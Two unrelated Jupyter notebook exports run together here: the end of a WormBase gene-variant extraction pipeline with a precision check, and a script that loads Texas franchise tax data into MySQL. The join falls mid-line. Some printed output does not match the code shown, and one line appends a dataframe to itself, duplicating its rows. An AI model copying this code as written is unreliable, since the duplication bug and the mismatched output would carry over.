Variation_type: if re.search(sub, sent, re.IGNORECASE): col_var_type.append(sub) if col_var_type: col_var_type = list(set(col_var_type)) col_var_type = ", ".join(col_var_type) else: 
col_var_type = '' updated_sheet.append(np.insert(row, -3, col_var_type).tolist()) data = np.array(updated_sheet) updated_sheet = None6.3 Functional effect & Generation method These type of data were in a few subset of papers tested during dev - expect these columns to be mostly empty.functional_effect = ['function uncertain', 'transcript function', 'translational product function', \ 'decreased transcript level', 'increased transcript level', 'decreased transcript stability', \ 'gain of function', 'dominant negative', 'dominant negativ', 'antimorphic', \ 'hypermorphic', 'neomorphic', 'conditional activity', 'hypomorphic', 'amorphic', \ 'repressible', 'misexpressed'] common_gen_methods = ['CRISPR', 'ENU', 'EMS'] updated_sheet = [] # 'WBPaper ID', 'WBGene', 'Gene', 'WBStrain', 'Strains', 'Variants', 'Mutation', 'Gene-Var combo', 'Variation type', 'Transcript', 'Warnings', 'Sentence' for i, row in enumerate(data): sent = row[-1] col_functional_effect = [] col_gen_method = [] for sub in functional_effect: if re.search(sub, sent, re.IGNORECASE): col_functional_effect.append(sub) for sub in common_gen_methods: if re.search(sub, sent): col_gen_method.append(sub) if col_functional_effect: col_functional_effect = list(set(col_functional_effect)) col_functional_effect = ", ".join(col_functional_effect) else: col_functional_effect = '' if col_gen_method: col_gen_method = list(set(col_gen_method)) col_gen_method = ", ".join(col_gen_method) else: col_gen_method = '' row = np.insert(row, -3, col_functional_effect) row = np.insert(row, -3, col_gen_method) updated_sheet.append(row.tolist()) data = np.array(updated_sheet) updated_sheet = None # saving things updated_sheet = pd.DataFrame(data[:], columns=['WBPaper ID', 'WBGene', 'Gene', 'WBStrain', 'Strains', \ 'Variants', 'Mutation', 'Gene-Var combo', 'Variation type', 'Functional effect', \ 'Generation method', 'Transcript', 'Warnings', 'Sentence']) updated_sheet.to_csv("data/model_output/processed/final.csv", index=False, encoding='utf-8') updated_sheet = None7 VerificationFinding precision by cross-checking with the manually curated data.data = pd.read_csv("data/model_output/processed/final.csv") data = data.to_numpy() paper_ids_processed = np.unique(data[:,0]) paper_ids_processed = np.sort(paper_ids_processed) temp = pd.read_csv("data/model_output/processed/snippets_1.csv") temp = temp.to_numpy() total_paper_ids_processed = np.unique(temp[:,0]) temp = None print('Total count of papers processed:', len(total_paper_ids_processed)) print('Count of papers:', len(paper_ids_processed))Total count of papers processed: 100 Count of papers: 537.1 Original ground truthground_truth = Path('data/gsoc/variantsDB.txt').read_text().split('\n') ground_truth = [r.split('\t') for r in ground_truth][:-1] ground_truth = np.array(ground_truth, dtype=object) # Checking if any processed paper is not in the ground truth file for id in total_paper_ids_processed: if id not in ground_truth[:,0]: print(id, end = ' ') if id in paper_ids_processed: print(' false positive') tp_col = [] for row in data: paper_id = row[0] gene = row[1] mutation = row[6] mutation = mutation.upper() transcript = row[-3] bool_found = False for label in ground_truth[ground_truth[:,0] == paper_id]: label[-2] = label[-2].upper() if transcript == label[-1] and mutation == label[-2]: bool_found = True # continue bc we're storing all the labels from a paper continue if bool_found: tp_col.append('True Positive') else: tp_col.append('False Positive') tp_col.count('True Positive'), tp_col.count('False Positive') 
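# (Illustrative aside, not part of the original notebook.) The precision printed in the
# next statement is simply TP / (TP + FP) over the extracted rows; a tiny sketch with
# made-up counts shows the formula being applied:
example_tp, example_fp = 48, 52
example_precision = example_tp * 100 / (example_tp + example_fp)  # -> 48.0 (percent)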
print('Precision ',tp_col.count('True Positive')*100/(tp_col.count('True Positive') + tp_col.count('False Positive')), '%')Precision 48.31115660184238 %7.2 Curated ground truth Updated after manually reviewing the "false positives" that are not actually false positives and adding them to the ground truth file.ground_truth = Path('data/gsoc/variantsDB_curated.txt').read_text().split('\n') ground_truth = [r.split('\t') for r in ground_truth][:-1] ground_truth = np.array(ground_truth, dtype=object) # Checking if any processed paper is not in the ground truth file for id in total_paper_ids_processed: if id not in ground_truth[:,0]: print(id, end = ' ') if id in paper_ids_processed: print(' false positive') tp_col = [] for row in data: paper_id = row[0] gene = row[1] mutation = row[6] mutation = mutation.upper() transcript = row[-3] bool_found = False for label in ground_truth[ground_truth[:,0] == paper_id]: label[-2] = label[-2].upper() if transcript == label[-1] and mutation == label[-2]: bool_found = True # continue bc we're storing all the labels from a paper continue if bool_found: tp_col.append('True Positive') else: tp_col.append('False Positive') tp_col.count('True Positive'), tp_col.count('False Positive') print('Precision ',tp_col.count('True Positive')*100/(tp_col.count('True Positive') + tp_col.count('False Positive')), '%') tp_col = np.array(tp_col).T.reshape(-1, 1) final_sheet = np.hstack((data,tp_col)) # saving things final_sheet = pd.DataFrame(final_sheet[:], columns=['WBPaper ID', 'WBGene', 'Gene', 'WBStrain', 'Strains', \ 'Variants', 'Mutation', 'Gene-Var combo', 'Variation type', 'Functional effect', \ 'Generation method', 'Transcript', 'Warnings', 'Sentence', 'Result']) final_sheet.to_csv("data/model_output/processed/final_verified.csv", index=False, encoding='utf-8')Checking how many matches are present in the ground truth for the processed papersall_from_truth = [] for ppr in paper_ids_processed: for label in ground_truth[ground_truth[:,0] == ppr]: label[-2] = label[-2].upper() all_from_truth.append(label) len(all_from_truth)Grabbing Public Hotel Occupancy Tax Data, then storing it into a database, cross-referencing to avoid repeated data Prerequisites: requirements for mysql-python communication:* pip install mysqlclient* pip install mysql-connector-python * if receiving a wheel error: pip install wheel# Imports import time import sys from zipfile import ZipFile import pandas as pd import pandas.io.sql as pdsql import glob, os import numpy as np # Datetime for new column import datetime # Imports for mySQL from sqlalchemy import create_engine, event, DateTime from db_setup import mysql_user, mysql_password, db_name import mysql.connectorFile path definedmydir = os.path.abspath('./HotelOccupancyTaxData') mydirDefining headers for data# Defining header for marketing data. 
Marketing data comes with no header # Franchise tax permit ftact_date_head = ['Taxpayer_Number', 'Taxpayer_Name', 'Taxpayer_Address', 'Taxpayer_City', 'Taxpayer_State', 'Taxpayer_Zip_Code', 'Taxpayer_County_Code', 'Taxpayer_Organizational_Type', 'Taxpayer_Phone_Number', 'Record_Type_Code', 'Responsibility_Beginning_Date', 'Secretary_of_State_File_Number', 'SOS_Charter_Date', 'SOS_Status_Date', 'Current_Exempt_Reason_Code', 'Agent_Name', 'Agent_Address', 'Agent_City', 'Agent_State', 'Agent_Zip_Code'] # Franchise tax permit date ftact_head = ['Taxpayer_Number', 'Taxpayer_Name', 'Taxpayer_Address', 'Taxpayer_City', 'Taxpayer_State', 'Taxpayer_Zip_Code', 'Taxpayer_County_Code', 'Taxpayer_Organizational_Type', 'Taxpayer_Phone_Number', 'Record_Type_Code', 'Responsibility_Beginning_Date', 'Responsibility_End_Date', 'Responsibility_End_Reason_Code', 'Secretary_of_State_File_Number', 'SOS_Charter_Date', 'SOS_Status_Date', 'SOS_Status_Code', 'Rigth_to_Tansact_Business_Code', 'Current_Exempt_Reason_Code', 'Exempt_Begin_Date', 'NAICS_Code']Extract files from zipped folder# extract all files i = 0 for file in glob.glob(mydir + '/*.zip'): i += 1 zip = ZipFile(file, 'r') print(f'Extracting file {i}') zip.extractall(mydir) zip.close() print('Done!') print(f"File {i}, extracted: {file}\n") time.sleep(1) os.remove(file)Extracting file 1 Done! File 1, extracted: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\FTACT.zip Extracting file 2 Done! File 2, extracted: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\PP_files.zip Extracting file 3 Done! File 3, extracted: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\Real_building_land.zip Extracting file 4 Done! 
File 4, extracted: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\STACT.zipAdd csv files to a data frame ( fran and stp)# Searches for a csv file df_fran = pd.DataFrame() for file in glob.glob(mydir + '/*.csv'): if 'fran' in file: df = pd.read_csv(file, header=None, index_col=False, names=ftact_date_head, engine ='python') df_fran = df_fran.append(df) os.remove(file) print('Added the ' + file + " into the DF df_fran") print("deleted the file " + str(file)) else: print('we do not know what to do with this file: ' + str(file))FRAN DF createddf_fran.head()Adding the Taxpayer County Name and Record Type Name Column# Taxpayer Organization Type: df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CF'),'Taxpayer_Organizational_Name']='Foreign Profit' # CF - Foreign Profit df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CI'),'Taxpayer_Organizational_Name']='Limited Liability Company - Foreign'# CI - Limited Liability Company - Foreign df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CL'),'Taxpayer_Organizational_Name']='Limited Liability Company - Texas' # CL - Limited Liability Company - Texas df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CM'),'Taxpayer_Organizational_Name']='Foreign Non-Profit' # CM - Foreign Non-Profit df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CN'),'Taxpayer_Organizational_Name']='Texas Non-Profit' # CN - Texas Non-Profit df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CP'),'Taxpayer_Organizational_Name']='Professional' # CP - Professional df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CR'),'Taxpayer_Organizational_Name']='Texas Insurance' # CR - Texas Insurance df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CS'),'Taxpayer_Organizational_Name']='Foreign Insurance - OOS' # CS - Foreign Insurance - OOS df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CT'),'Taxpayer_Organizational_Name']='Texas Profit' # CT - Texas Profit df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CW'),'Taxpayer_Organizational_Name']='Texas Railroad Corporation' # CW - Texas Railroad Corporation df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CX'),'Taxpayer_Organizational_Name']='Foreign Railroad Corporation - OOS' # CX - Foreign Railroad Corporation - OOS # Record Type Code: df_fran.loc[(df_fran.Record_Type_Code == 'U'),'Record_Type_Name']='Secretary of State (SOS) File Number' # U = Secretary of State (SOS) File Number df_fran.loc[(df_fran.Record_Type_Code == 'V'),'Record_Type_Name']='SOS Certificate of Authority (COA) File Number' # V = SOS Certificate of Authority (COA) File Number df_fran.loc[(df_fran.Record_Type_Code == 'X'),'Record_Type_Name']='Comptroller Assigned File Number' # X = Comptroller Assigned File Number df_fran.head()Date format# df_fran['SOS_Charter_Date'] = df_fran['SOS_Charter_Date'].str.strip() df_fran['SOS_Charter_Date'] = df_fran['SOS_Charter_Date'].fillna(0) df_fran['SOS_Status_Date'] = df_fran['SOS_Status_Date'].fillna(0) # df_fran['SOS_Charter_Date'] = df_fran['SOS_Charter_Date'].astype(np.int64) # df_fran['SOS_Status_Date'] = df_fran['SOS_Status_Date'].astype(np.int64) df_fran['Responsibility_Beginning_Date'] = df_fran['Responsibility_Beginning_Date'].astype(np.int64) df_fran['SOS_Charter_Date'] = pd.to_datetime(df_fran["SOS_Charter_Date"], format='%Y%m%d', errors='coerce') df_fran['SOS_Status_Date'] = pd.to_datetime(df_fran["SOS_Status_Date"], format='%Y%m%d', errors='coerce') df_fran['Responsibility_Beginning_Date'] = 
pd.to_datetime(df_fran["Responsibility_Beginning_Date"], format='%Y%m%d', errors='coerce') df_fran['SOS_Charter_Date'] =df_fran['SOS_Charter_Date'].dt.normalize() df_fran['SOS_Status_Date'] = df_fran['SOS_Status_Date'].dt.normalize() df_fran['Responsibility_Beginning_Date'] = df_fran['Responsibility_Beginning_Date'].dt.normalize() df_fran = df_fran[df_fran['Taxpayer_Zip_Code']!=0] df_fran.head()Checking column countdf_fran.count()Extracting textfile and storing into DF (FTOFFDIR, FTACT, STACT)for file in glob.glob(mydir + '/*.txt'): if 'FTACT' in file: df_ftact = pd.read_fwf(file, widths=[11, 50, 40, 20, 2, 5, 3, 2, 10, 1, 8, 8, 2, 10, 8, 8, 2, 1, 3, 8, 6], header=None, names=ftact_head, index_col=False, engine= 'python') # FTOOB, FTACT df_ftact = df_ftact.append(df_ftact) os.remove(file) print('Added the ' + file + ' into df_ftact') print('deleted the file ' + str(file)) else: os.remove(file) print('File not being used: ' + str(file))File not being used: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\building_other.txt File not being used: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\building_res.txt File not being used: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\exterior.txt File not being used: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\extra_features.txt File not being used: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\extra_features_detail1.txt File not being used: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\extra_features_detail2.txt File not being used: C:\DataAnalyticsBootCamp\WEEK_23 - [...]FTACT DF createddf_ftact.head()Taxpayer_Organizational_Name and Record_Type_Name Column# Taxpayer Organization Type: df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'AB'),'Taxpayer_Organizational_Name']='Texas Business Association' # AB – Texas Business Association df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'AC'),'Taxpayer_Organizational_Name']='Foreign Business Association' # AC – Foreign Business Association df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'AF'),'Taxpayer_Organizational_Name']='Foreign Professional Association' # AF – Foreign Professional Association df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'AP'),'Taxpayer_Organizational_Name']='Texas Professional Association' # AP – Texas Professional Association df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'AR'),'Taxpayer_Organizational_Name']='Other Association' # AR – Other Association df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CF'),'Taxpayer_Organizational_Name']='Foreign Profit' # CF - Foreign Profit df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CI'),'Taxpayer_Organizational_Name']='Limited Liability Company - Foreign' # CI - Limited Liability Company - Foreign df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CL'),'Taxpayer_Organizational_Name']='Limited Liability Company - Texas' # CL - Limited Liability Company - Texas df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CM'),'Taxpayer_Organizational_Name']='Foreign Non-Profit' # CM - Foreign Non-Profit df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 
'CN'),'Taxpayer_Organizational_Name']='Texas Non-Profit' # CN - Texas Non-Profit df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CP'),'Taxpayer_Organizational_Name']='Professional' # CP - Professional df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CR'),'Taxpayer_Organizational_Name']='Texas Insurance' # CR - Texas Insurance df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CS'),'Taxpayer_Organizational_Name']='Foreign Insurance - OOS' # CS - Foreign Insurance - OOS df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CT'),'Taxpayer_Organizational_Name']='Texas Profit' # CT - Texas Profit df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CU'),'Taxpayer_Organizational_Name']='Foreign Professional Corporation' # CU – Foreign Professional Corporation df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CW'),'Taxpayer_Organizational_Name']='Texas Railroad Corporation' # CW - Texas Railroad Corporation df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CX'),'Taxpayer_Organizational_Name']='Foreign Railroad Corporation - OOS' # CX - Foreign Railroad Corporation – OOS df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'HF'),'Taxpayer_Organizational_Name']='Foreign Holding Company' # HF – Foreign Holding Company df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'PB'),'Taxpayer_Organizational_Name']='Business General Partnership' # PB – Business General Partnership df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'PF'),'Taxpayer_Organizational_Name']='Foreign Limited Partnership' # PF – Foreign Limited Partnership df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'PI'),'Taxpayer_Organizational_Name']='Individual General Partnership' # PI – Individual General Partnership df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'PL'),'Taxpayer_Organizational_Name']='Texas Limited Partnership' # PL – Texas Limited Partnership df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'PV'),'Taxpayer_Organizational_Name']='Texas Joint Venture' # PV – Texas Joint Venture df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'PW'),'Taxpayer_Organizational_Name']='Foreign Joint Venture' # PW – Foreign Joint Venture df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'PX'),'Taxpayer_Organizational_Name']='Texas Limited Liability Partnership' # PX – Texas Limited Liability Partnership df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'PY'),'Taxpayer_Organizational_Name']='Foreign Limited Liability Partnerhsip' # PY – Foreign Limited Liability Partnerhsip df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'SF'),'Taxpayer_Organizational_Name']='Foreign Joint Stock Company' # SF – Foreign Joint Stock Company df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'ST'),'Taxpayer_Organizational_Name']='Texas Joint Stock Company' # ST – Texas Joint Stock Company df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'TF'),'Taxpayer_Organizational_Name']='Foreign Business Trust' # TF – Foreign Business Trust df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'TH'),'Taxpayer_Organizational_Name']='Texas Real Estate Investment Trust' # TH – Texas Real Estate Investment Trust df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'TI'),'Taxpayer_Organizational_Name']='Foreign Real Estate Investment Trust' # TI – Foreign Real Estate Investment Trust df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'TR'),'Taxpayer_Organizational_Name']='Texas Business Trust' # TR – Texas Business Trust # Record Type Code: df_ftact.loc[(df_ftact.Record_Type_Code 
== 'U'),'Record_Type_Name']='Secretary of State (SOS) File Number' # U = Secretary of State (SOS) File Number df_ftact.loc[(df_ftact.Record_Type_Code == 'V'),'Record_Type_Name']='SOS Certificate of Authority (COA) File Number' # V = SOS Certificate of Authority (COA) File Number df_ftact.loc[(df_ftact.Record_Type_Code == 'X'),'Record_Type_Name']='Comptroller Assigned File Number' # X = Comptroller Assigned File Number df_ftact.head() # (Description for context) SOS Charter/COA: # Depending on the Record Type Code value, this number # is the SOS, COA or Comptroller Assigned File Number. # If the Record Type Code is an 'X', this field will be # blank. They do not have a current SOS Charter/COA.Responsibility_End_Reason_Name column# Responsibility End Reason Code: # This is for mostly for Record Type Code value 'X'. df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 0),'Responsibility_End_Reason_Name']='Active or Inactive with no Reason Code' # 00 = Active or Inactive with no Reason Code df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 1),'Responsibility_End_Reason_Name']='Discountinued Doing Business' # 01 = Discountinued Doing Business df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 2),'Responsibility_End_Reason_Name']='Dissolved in Home State' # 02 = Dissolved in Home State df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 3),'Responsibility_End_Reason_Name']='Merged Out of Existence' # 03 = Merged Out of Existence df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 4),'Responsibility_End_Reason_Name']='Converted' # 04 = Converted df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 5),'Responsibility_End_Reason_Name']='Consolidated' # 05 = Consolidated df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 6),'Responsibility_End_Reason_Name']='Forfeited in Home State' # 06 = Forfeited in Home State df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 8),'Responsibility_End_Reason_Name']='No Nexus' # 08 = No Nexus df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 9),'Responsibility_End_Reason_Name']='No Nexus – Dates not the same' # 09 = No Nexus – Dates not the same df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 11),'Responsibility_End_Reason_Name']='Special Information Report' # 11 = Special Information Report df_ftact.head()SOS_Status_Name Column# (Context description) SOS Charter/COA: # Depending on the Record Type Code value, this number # is the SOS, COA or Comptroller Assigned File Number. # If the Record Type Code is an 'X', this field will be # blank. They do not have a current SOS Charter/COA. 
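# (Illustrative aside, not part of the original notebook.) The repeated .loc assignments
# used throughout this section can also be written with a lookup dict and Series.map;
# a minimal sketch using a hypothetical subset of the SOS status codes mapped below:
import pandas as pd
demo = pd.DataFrame({'SOS_Status_Code': ['A', 'F', 'T']})
status_names = {'A': 'Active', 'F': 'Forfeited Franchise Tax', 'T': 'Terminated'}
demo['SOS_Status_Name'] = demo['SOS_Status_Code'].map(status_names)  # unmapped codes become NaN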
# SOS Status Code: # For Charter/COA Numbers: df_ftact.loc[(df_ftact.SOS_Status_Code == 'A'),'SOS_Status_Name']='Active' # A = Active df_ftact.loc[(df_ftact.SOS_Status_Code == 'B'),'SOS_Status_Name']='Consolidated' # B = Consolidated df_ftact.loc[(df_ftact.SOS_Status_Code == 'C'),'SOS_Status_Name']='Converted' # C = Converted df_ftact.loc[(df_ftact.SOS_Status_Code == 'D'),'SOS_Status_Name']='Dissolved' # D = Dissolved df_ftact.loc[(df_ftact.SOS_Status_Code == 'E'),'SOS_Status_Name']='Expired' # E = Expired df_ftact.loc[(df_ftact.SOS_Status_Code == 'F'),'SOS_Status_Name']='Forfeited Franchise Tax' # F = Forfeited Franchise Tax df_ftact.loc[(df_ftact.SOS_Status_Code == 'G'),'SOS_Status_Name']='Miscellaneous' # G = Miscellaneous df_ftact.loc[(df_ftact.SOS_Status_Code == 'I'),'SOS_Status_Name']='Closed by FDIC' # I = Closed by FDIC df_ftact.loc[(df_ftact.SOS_Status_Code == 'J'),'SOS_Status_Name']='State Charter Pulled' # J = State Charter Pulled df_ftact.loc[(df_ftact.SOS_Status_Code == 'K'),'SOS_Status_Name']='Forfeited Registered Agent' # K = Forfeited Registered Agent df_ftact.loc[(df_ftact.SOS_Status_Code == 'L'),'SOS_Status_Name']='Forfeited Registered Office' # L = Forfeited Registered Office df_ftact.loc[(df_ftact.SOS_Status_Code == 'M'),'SOS_Status_Name']='Merger' # M = Merger df_ftact.loc[(df_ftact.SOS_Status_Code == 'N'),'SOS_Status_Name']='Forfeited Hot Check' # N = Forfeited Hot Check df_ftact.loc[(df_ftact.SOS_Status_Code == 'P'),'SOS_Status_Name']='Forfeited Court Order' # P = Forfeited Court Order df_ftact.loc[(df_ftact.SOS_Status_Code == 'R'),'SOS_Status_Name']='Reinstated' # R = Reinstated df_ftact.loc[(df_ftact.SOS_Status_Code == 'T'),'SOS_Status_Name']='Terminated' # T = Terminated df_ftact.loc[(df_ftact.SOS_Status_Code == 'W'),'SOS_Status_Name']='Withdrawn' # W = Withdrawn df_ftact.loc[(df_ftact.SOS_Status_Code == 'Y'),'SOS_Status_Name']='Dead at Conversion 69' # Y = Dead at Conversion 69 df_ftact.loc[(df_ftact.SOS_Status_Code == 'Z'),'SOS_Status_Name']='Dead at Conversion 83' # Z = Dead at Conversion 83 df_ftact.head()Rigth_to_Tansact_Business_Name Column# Exempt Reason Code: # blank = Not Exempt # rest = Exempt for various reasons. A list of value descriptions # may be requested separately. 
# Right to Transact Business Code: # blank = Franchise Tax Ended df_ftact.loc[(df_ftact.Rigth_to_Tansact_Business_Code == 'A'),'Rigth_to_Tansact_Business_Name']='Active' # A = Active df_ftact.loc[(df_ftact.Rigth_to_Tansact_Business_Code == 'D'),'Rigth_to_Tansact_Business_Name']='Active – Eligible for Termination/Withdrawl' # D = Active – Eligible for Termination/Withdrawl df_ftact.loc[(df_ftact.Rigth_to_Tansact_Business_Code == 'N'),'Rigth_to_Tansact_Business_Name']='Forfeited' # N = Forfeited df_ftact.loc[(df_ftact.Rigth_to_Tansact_Business_Code == 'I'),'Rigth_to_Tansact_Business_Name']='Franchise Tax Involuntarily Ended' # I = Franchise Tax Involuntarily Ended df_ftact.loc[(df_ftact.Rigth_to_Tansact_Business_Code == 'U'),'Rigth_to_Tansact_Business_Name']='Franchise Tax Not Established' # U = Franchise Tax Not Established df_ftact.head()Formating data* changing float to int* adding datetime formatdf_ftact['Taxpayer_Zip_Code'] = df_ftact['Taxpayer_Zip_Code'].fillna(0) df_ftact['SOS_Charter_Date'] = df_ftact['SOS_Charter_Date'].fillna(0) df_ftact['SOS_Status_Date'] = df_ftact['SOS_Status_Date'].fillna(0) df_ftact['Secretary_of_State_File_Number'] = df_ftact['Secretary_of_State_File_Number'].fillna(0) df_ftact['NAICS_Code'] = df_ftact['NAICS_Code'].fillna(0) df_ftact['Current_Exempt_Reason_Code'] = df_ftact['Current_Exempt_Reason_Code'].fillna(0) df_ftact['Taxpayer_Zip_Code'] = df_ftact['Taxpayer_Zip_Code'].astype(np.int64) df_ftact['SOS_Charter_Date'] = df_ftact['SOS_Charter_Date'].astype(np.int64) df_ftact['SOS_Status_Date'] = df_ftact['SOS_Status_Date'].astype(np.int64) df_ftact['Responsibility_Beginning_Date'] = df_ftact['Responsibility_Beginning_Date'].astype(np.int64) df_ftact['Secretary_of_State_File_Number'] = df_ftact['Secretary_of_State_File_Number'].astype(np.int64) df_ftact['NAICS_Code'] = df_ftact['NAICS_Code'].astype(np.int64) df_ftact['Current_Exempt_Reason_Code'] = df_ftact['Current_Exempt_Reason_Code'].astype(np.int64) df_ftact['SOS_Charter_Date'] = pd.to_datetime(df_ftact["SOS_Charter_Date"], format='%Y%m%d', errors='coerce') df_ftact['SOS_Status_Date'] = pd.to_datetime(df_ftact["SOS_Status_Date"], format='%Y%m%d', errors='coerce') df_ftact['Responsibility_Beginning_Date'] = pd.to_datetime(df_ftact["Responsibility_Beginning_Date"], format='%Y%m%d', errors='coerce') df_ftact['SOS_Charter_Date'] = df_ftact['SOS_Charter_Date'].dt.normalize() df_ftact['SOS_Status_Date'] = df_ftact['SOS_Status_Date'].dt.normalize() df_ftact['Responsibility_Beginning_Date'] = df_ftact['Responsibility_Beginning_Date'].dt.normalize() df_ftact = df_ftact[df_ftact['Taxpayer_Zip_Code']!=0] df_ftact.head()Upload DF's to Database* Adding database connection* Defining the Engine** I was getting charmap error when attempting to drop the data to the database. I defined encoding = utf-8, yet it still did not work. 
Only when I hardcoded the charset within the engine string did the error finally go away.connection_string = f"{mysql_user}:{mysql_password}@localhost:3306/{db_name}?charset=utf8" engine = create_engine(f'mysql://{connection_string}') engine.table_names()Creating two variables for today's date and today's datetimecurrentDT = datetime.datetime.now() DateTimeSent = currentDT.strftime("%Y-%m-%d %H:%M:%S") dateCSV = currentDT.strftime("%Y-%m-%d") print(dateCSV) print(DateTimeSent)2020-03-25 2020-03-25 02:13:35Calling database tables for cross-referencing df data, to have non-duplicated data* Grabbing data from the database and storing the tax number column into a dataframeftact_in_db = pdsql.read_sql("SELECT Taxpayer_Number FROM franchise_tax_info",engine) print(f"Data count for ftact from the database : {len(ftact_in_db)}\n") try: if df_fran.size != 0: print(f"\nData count from the new df data for df_fran: {len(df_fran)}") except Exception as e: print("df_fran does not exist. Check your data source if it is available") try: if df_ftact.size != 0: print(f"Data count from the new df data for df_ftact: {len(df_ftact)}") except Exception as e: print("df_ftact does not exist. Check your data source if it is available")Data count for ftact from the database : 0 Data count for stact from the Database: 0 Data count for ftoffdir from the Database: 0 Data count from the new df data for df_ftact: 4236082 Data count from the new df data for df_stact: 1554488 df_ftoffdir does not exist. Check your data source if it is availableFTACT aka df_ftact Checking table df with df data to make sure there are no duplicate taxpayer numbers* filtering new ftact with data from the database* Checking data for ftact and also adding a new column of today's date and time* Appending new companies (df_ftact) to csv and Databasetry: df_ftact = df_ftact[~df_ftact['Taxpayer_Number'].astype(int).isin(ftact_in_db['Taxpayer_Number'].astype(int))] if df_ftact.size != 0: df_ftact['DateTime'] = DateTimeSent print(f"There are {len(ftact_in_db)} data attributes in ftact table from the database\n{len(df_ftact)} new companies, based on tax payer number from filtered data df_ftact") df_ftact.to_sql(name='franchise_tax_info', con=engine, if_exists='append', index=False, chunksize=1000) print(f"ftact to database append, completed") f = open('HotelOccupancyTaxData/formattedData/DBUploadRecord.txt','a+') f.write(f'{DateTimeSent}\nftact_{dateCSV}.csv, {len(df_ftact)}, franchise_tax_info table, {len(ftact_in_db)}\n') f.close() else: print("No new data") f = open('HotelOccupancyTaxData/formattedData/DBUploadRecord.txt','a+') f.write(f'{DateTimeSent}\nftact_{dateCSV}.csv, {len(df_ftact)}, franchise_tax_info table, {len(ftact_in_db)}\n') f.close() except Exception as e: print(f"Something went wrong, df_ftact was not able to append to database or no new data: {e}")There are 0 data attributes in ftact table from the database 4236082 new companies, based on tax payer number from filtered data df_ftact ftact to database append, completedCall the tables within the database and store them into a variable* Going to compare new data from the database with df_franftact_date_in_db = pdsql.read_sql("SELECT Taxpayer_Number FROM franchise_tax_info_date",engine) print(f"There are {len(ftact_date_in_db)} records in franchise tax permit date table.\n")There are 0 records in franchise tax permit date table. 
